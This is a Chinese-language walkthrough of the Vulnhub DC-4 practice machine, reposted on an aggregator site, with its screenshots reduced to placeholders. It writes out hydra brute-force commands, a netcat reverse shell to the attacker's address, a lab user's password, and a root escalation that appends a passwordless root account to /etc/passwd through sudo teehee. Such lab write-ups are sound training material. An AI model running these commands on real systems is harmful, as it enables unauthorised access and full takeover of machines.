DC-4靶机

Posted bingtang123

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DC-4靶机相关的知识,希望对你有一定的参考价值。

仅供个人娱乐

靶机信息

下载地址:http://www.five86.com/downloads/DC-4.zip

一、主机扫描

arp-scan -l

nmap -p 1-65535 -A -sV 192.168.17.130

技术图片

二、信息收集

dirb http://192.168.17.130

技术图片
技术图片
技术图片
技术图片
技术图片

三、漏洞查找和利用

爆破ssh

hydra -L /root/user.txt -P /root/rockyou.txt -t 5 ssh://192.168.17.130

技术图片

字典设置太大了。

web页面

技术图片

爆破

技术图片
技术图片

或者使用hydra 爆破密码

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.17.130 http-post-form "/login.php:username=^USER^ password=^PASS^:S=logout" -F

登录成功

技术图片

信息收集

技术图片

抓包

技术图片
技术图片
技术图片
技术图片

可以反弹shell命令:

nc -e /bin/bash 192.168.17.129 4444

技术图片
技术图片

python -c ‘import pty;pty.spawn("/bin/bash")‘

技术图片

信息收集

技术图片
技术图片

复制 作为字典

技术图片

ssh登录

技术图片

查看信息

技术图片
技术图片

切换账户登录[charles:^xHhA&hvim0y]

技术图片

查看用户权限发现,该用户可以以root权限免密码执行 /usr/bin/teehee

技术图片

信息收集

技术图片

第一种获取权限方法

添加账户

echo test::0:0:::/bin/bash | sudo teehee -a /etc/passwd

tail -n 5 /etc/passwd

su test

技术图片
技术图片

以上是关于DC-4靶机的主要内容,如果未能解决你的问题,请参考以下文章

DC-4靶机

畅游DC-4靶机

Vulnhub入门实战 4-DC:4

Vulnhub入门实战 4-DC:4

DC-4靶场练习—teehee提权

靶机渗透HACKME: 1